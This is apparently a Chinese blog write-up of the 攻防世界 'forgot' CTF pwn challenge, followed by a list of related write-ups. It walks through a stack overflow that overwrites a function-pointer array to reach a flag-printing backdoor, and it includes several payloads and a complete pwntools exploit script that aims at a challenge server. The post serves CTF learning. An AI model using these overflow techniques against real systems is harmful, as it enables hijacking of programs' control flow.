《攻防世界》forgot栈空间题

最新推荐文章于 2024-07-18 20:41:19 发布
原创 最新推荐文章于 2024-07-18 20:41:19 发布 · 3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#unctf

博主在分析一道逻辑题时,发现程序可能存在栈溢出漏洞。通过观察输入限制和算法,尝试构造溢出payload,目标是覆盖栈上的返回地址。在调试过程中,定位到程序卡住的地方,并发现可以覆盖栈上特定位置的值来改变调用流程。最终,通过填充特定长度的数据成功影响了程序执行,但未能完全解决题目。博客探讨了溢出攻击的步骤和思路,以及在调试过程中的观察和尝试。

哈哈哈,讲下这题的思路,拿到题目又是一大堆的字符串显示在控制台上,本想着又是一道逻辑题,披着逆向算法的外套,害,没办法继续分析

前面输入name用了fgets函数但是限制输入长度了,所以直接忽略,然后就是输入一个数对其进行简单的小算法了,我显示分析了一波算法,然后根据出题人的提示说这个,但是我好像还是摸不清题目的漏洞在哪里,就一直摸摸摸,先是简单的看了下全局伪代码,加上程序运行状况,发现你输入的数就算是通过了9层判断条件好像也是一样的打印一些字符串

在这里插入图片描述

这十个函数里面都是一样的没什么区别

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2bC7XCZd-1637048344211)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116143753691.png)]

然后出题人那个提示我也不知道有什么关系,可能是我太菜了,没有找到题目真正的考点吧。。。发现程序没有什么特别之处,就直接进行溢出了

编写溢出payload代码

z('b *0x8048a61')
sla('> ','admin')
payload =   b'a'*0x74 + b'a' * 4 + p32(0x80486CC)
sla('> ',payload)

运行后发现程序在这个地方卡住了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VZpwFYHo-1637048344212)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116145723577.png)]

看了下这时候的栈发现实际情况少填充了4位

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YSPwh9bx-1637048344213)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116145858096.png)]

但是我添加了4位数据后,程序依旧卡死在这个地方了,然后我就在这个地方下断点看看正常情况下这里的数据是什么

修改后payload

z('b *0x8048a61')
sla('> ','admin')
payload =   b'aaaa'
sla('> ',payload)
p.interactive()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Yqcb1dkR-1637048344215)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116150151492.png)]

发现它call了0x8048618,然后就跳转到这个地址了,上面一行发现这个值就是从栈里面取得,那么看看栈

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-peTEq2oU-1637048344216)(C:\Users\54622\AppData\Roaming\Typora\typora-user-images\image-20211116153402998.png)]

这里不就是那十个变量的位置吗,那么根据ida得出相对距离,对刚才0x8048618地址进行覆盖成后门函数的地址

z('b *0x8048a61')
sla('> ','admin')
payload =   b'a' * (0x78-0x54) + p32(0x80486CC)

ok获取flag

最终payload

from pwn import *
from LibcSearcher import *

context (log_level = 'debug' ,bits=32 ,os = 'linux' ,arch = 'i386' ,terminal = ['tmux' , 'splitw', '-h'])
#context (log_level = 'debug' ,bits= 32,os = 'linux' ,arch = 'i386' ,terminal = ['gnome-terminal' , '-x','sh', '-c'])


# Interface
local = 1
binary_name = "forgot"
ip = "111.200.241.244"
port = 52418

if local:
        p = process(["./" + binary_name])
        e = ELF("./" + binary_name)
        # libc = e.libc
else:
        p = remote(ip, port)
        e = ELF("./" + binary_name)
        # libc = ELF("libc-2.23.so")


def z(a=''):
        if local:
                gdb.attach(p, a)
                if a == '':
                        raw_input()
        else:
                pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)

z('b *0x8048a61')
sla('> ','admin')
payload =   b'a' * (0x78-0x54) + p32(0x80486CC)
sla('> ',payload)

p.interactive()
攻防世界--进阶区--forgot
Rt1Text的博客
06-19 377
32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出 可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v
攻防世界(PWN)forgot
苗_的博客
10-12 375
感觉有些wp写的不是特别详细,当时我看的时候有的地方也是看不太懂... 先拖进ida中看一下: 找到溢出点,因为我们分配给了v2 32byte的内存,但是scanf不限制长度,所以这里可以溢出。 第88行就是决定程序走向的语句了。 初步思路就是栈上的变量覆盖,在v2这里溢出,覆盖掉v3,然后让程序走到sub_80486CC: 既然我们要覆盖v3,那么根据(&v3+ --v14)我们需要让v14的值不变,因为v14 = 1则--v14 = 0,这样程序就会顺利的走到v3. 观察
[攻防世界]forgot
逆向萌新的博客
06-21 329
[攻防世界]forgot详解
攻防世界pwnforgot
m0_62396648的博客
06-05 650
该文件是32位的,canary和PIE保护机制没开。总览:该函数就是:v5初值为1,对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句,最后调用相应的函数。同时,发现文件里面已经含有cat flag的函数: 函数snprintf介绍: printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后
攻防世界)(pwn)forgot
PLpa的博客
07-21 2500
我也是想了好久啊,实在是没找到什么办法,后来还是把目给摸透了根据经验一个个试出来的方法!!! 拿到目下载附件查看保护: 只开了NX,嗯。。。 进入IDA,————惊了,这个是啥子意思??? 一大堆奇奇怪怪的东西,实在是看不懂,我们只能看看几个关键的输入点: 第一个输入name: 没有什么东西,进行看string v2 : 我们看到距离32的地方,有个0x54的函数指针: 找...
攻防世界(Pwn) forgot---栈溢出;(方法二)
半岛铁盒的博客
03-02 479
攻防世界(Pwn) forgot—栈溢出;(方法一) 里面对问描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[--v5] v5的值随着for循环 会发生改变 v2输入是溢出点 v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了 干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC 此时无论v5等于什么,我们都会得到目标 fla
攻防世界pwnforgot.doc
07-13
本文档是关于攻击防御世界pwnForgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、return-to-libc攻击、get_flag函数、...
攻防世界forgot——让人眼花目眩的一道(详细菜鸡向)
weixin_48066554的博客
02-10 1640
攻防世界forgot——让人眼花目眩的一道 今天做了一道攻防世界的进阶,看起来复杂的一匹,但是实际上也就这吧 (随手关掉刚刚百度到的wp [doge]),做完后最直观的感受就是自己的代码阅读能力还有待提高。话不多说,先check个sec: 只开了NX(栈不可执行),四舍五入等于没开保护,直接上伪代码 反汇编伪代码如下: int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWOR
攻防世界高手进阶区 ——forgot
weixin_62675330的博客
02-20 446
攻防世界高手进阶区 ——forgot 看了半天,啥也没看懂,做出来了才发现啥也不是。 一,分析文件 checksec 还好,只开启了堆栈不可执行。 运行一下 翻译了一下,应该是判断邮箱是否合乎规矩。 直接ida int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWORD v3[10]; // [esp+30h] [ebp-54h] char s[32]; //
[攻防世界 pwn]——forgot
Y_peak的博客
02-20 280
[攻防世界 pwn]——forgot 目地址: https://adworld.xctf.org.cn/ 目: 在checksec看下保护 在IDA中, 竟然有后面函数, 找到sub_80486CC函数地址 发现最后(*(&v3 + --v14))()执行 我们可以令v14 = 1这样就相当于v3所指向的函数执行 将v3所指向的函数地址覆盖为我们想要的函数地址就可以了 第一个栈溢出无法利用, 第二个可以利用 利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20 e
攻防世界 forgot
10-04 1427
1.目 2.IDA分析 3.流程分析 流程:输入名字,邮箱,邮箱校验完,执行v3+--v14处的代码。v3原本指向sub_8048604的,我们发现sub_80486CC才是我们需要运行的函数。 思路:①为了避免v14影响结果,输入字符避免进入case判断。②通过输入邮箱进行栈溢出覆盖v3的内容,使它指向sub_80486CC。exp如下: from pwn import * #io = process('./level2') io = remote('220.249.52...
C表达式((void (*)(void))0();
雾里看花
11-17 1798
C表达式((void (*)(void))0();通过一步步来讲解: 没有参数和不返回值void f(void)定义一个指针没有参数和返回值void (*p)(void)定义一个仅有类型的指针(void(*))(void)定义一个强转类型(类型定义在括号内,跟着一个值)(void (*)(void))0到目前为止我们定义了一个由0强转成一个指向函数且返回值。这个转换时一个指针到函数的类型。(yo
攻防世界:PWN刷-forgot
m0_53932372的博客
12-30 2354
forgot,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界-pwn forgot(栈内变量覆盖)
菜的只能随便写写博客
10-17 852
0x01 文件检查 32位elf 无栈保护 无地址随机化   0x02 程序运行分析  发现有两个输入的地方,并且第一个地方有回显。   0x03 IDA分析  如图,阅读程序结构后,发现第二个输入点(41行)可以进行栈溢出,第88行是调用的栈里面的函数地址,所以,如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址,就可以了。  搜索字符串,发...
攻防世界forgot
qq_25044201的博客
01-06 224
我们用ida来看一下 int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); // [esp+38h] [ebp-4Ch] int (*v6)(); // [esp+3Ch] [ebp-48h] int (*v7)(..
攻防世界-pwn-forgot
最新发布
2301_80384146的博客
07-18 361
至此:可以知道,出人想让我们控制字符串的长度和字符类型来控制v5的值,通过控制v5的值来调用在v3指针数组的对应的函数去调用到system函数,但我们只需要1就OK了。且有一个对flag的打印函数(这个函数不咋好找,但就是一个普通函数,地址:0x080486CC)首先你需要输入一个char类型的字符串s[ebp-2ch](键盘接收函数fgets长度限制31)接收一个char类型的字符串v2[ebp-74h](没有长度要求,为溢出点)大概意思是对v2字符串的前10位做出要求,大于10位退出for循环。
攻防世界——pwn_forgot
syk的博客
05-28 1781
checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...
攻防世界 Pwn forgot
MrTreebook的博客
12-18 183
攻防世界 Pwn forgot1.目下载地址2.checksec3.IDA4.exp 1.目下载地址 点击下载 2.checksec 没有canary,可以随便溢出 没有PIE。可以随便使用后门函数 3.IDA 可以看到有两个溢出点 第一处限制了输入大小,我们就不管了 第二处是一个简单的溢出 只要知道需要覆盖多少byte数据就可以 接下来找到了cat flag的后门 也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了 4.exp from pwn import * io = rem
攻防世界(Pwn) forgot---栈溢出;(方法一)
半岛铁盒的博客
03-02 1025
介绍 这道表面看起来有点复杂,其实很简单,有两种方法可以来做这一道; 方法一 文件运行流程是: 1.先输入名字 2. 输入一串字符串 3.for循环验证字符串v5的值改变;4.返回v3[–5]函数; 1.溢出点 scanf函数 2.漏洞利用 最终返回的是 v3[--v5] 的一个函数, v5的值是在for循环之中改变的;v5的初始值是1; 把函数返回的目的地改为   0x80486CC就可以了; 只要修改 v3[0]-v3[9] 其中一个就可以了,这里选择修改v3[0] v3[--
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwnforgot](https://blog.youkuaiyun.com/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷-forgot](https://blog.youkuaiyun.com/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值